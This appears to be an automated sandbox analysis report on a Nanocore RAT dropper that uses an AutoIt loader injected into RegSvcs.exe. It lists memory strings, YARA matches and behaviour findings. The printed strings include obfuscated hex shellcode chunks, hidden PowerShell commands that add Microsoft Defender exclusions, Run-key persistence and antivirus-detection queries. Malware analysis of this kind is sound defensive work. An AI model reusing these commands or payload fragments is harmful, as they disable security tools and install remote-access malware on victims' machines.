Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"i
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)m
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c7
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0e
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953~
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6z
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6k
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6t
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247ce
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6!
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6[
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ed
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6u
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: btklr
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0xh*5z
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0x6,5
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \rings
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: array
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exe_c
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: le3t?
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_sz
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: runonce0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6-
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: arrayslist
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scriptdir
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002B1A91

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_00253312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

7_2_00253312

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BEBB3 mouse_event,

7_2_002BEBB3

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002B1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

7_2_002B1EF3

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002B13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

7_2_002B13F2

Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007228000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000000.395755947.0000000000313000.00000002.00000001.01000000.0000000A.sdmp, boaliim.dat.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegSvcs.exe, 0000000D.00000002.636564713.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: boaliim.dat	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerD$
Source: boaliim.dat, 00000007.00000003.427785381.0000000001872000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managero
Source: boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000D.00000002.649636221.0000000006E6C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerram Managerp
Source: RegSvcs.exe, 0000000D.00000002.633864809.0000000001ABE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerram Manager
Source: RegSvcs.exe, 0000000D.00000002.652061665.0000000007DBE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerJ
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000D.00000002.636564713.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000390F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\2
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000038E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager4
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000390F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerHa

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0096AF0F

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096F654 cpuid

0_2_0096F654

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0096DF1E

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_0028BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

7_2_0028BCF2

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002AE5F8 GetUserNameW,

7_2_002AE5F8

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0095B146 GetVersionExW,

0_2_0095B146

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

AV process strings found (often used to terminate AV products)

Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: boaliim.dat	Binary or memory string: WIN_81
Source: boaliim.dat	Binary or memory string: WIN_XP
Source: boaliim.dat.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
